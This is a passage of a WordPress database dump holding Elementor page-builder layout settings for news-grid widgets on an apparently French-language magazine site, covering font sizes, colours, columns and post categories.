date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1332,465,'_elementor_version','0.4'),(1340,472,'_elementor_edit_mode','builder'),(1341,472,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1342,472,'_elementor_version','0.4'),(1343,472,'_elementor_css','a:3:{s:4:\"time\";i:1508912730;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1344,473,'_elementor_edit_mode','builder'),(1345,473,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_w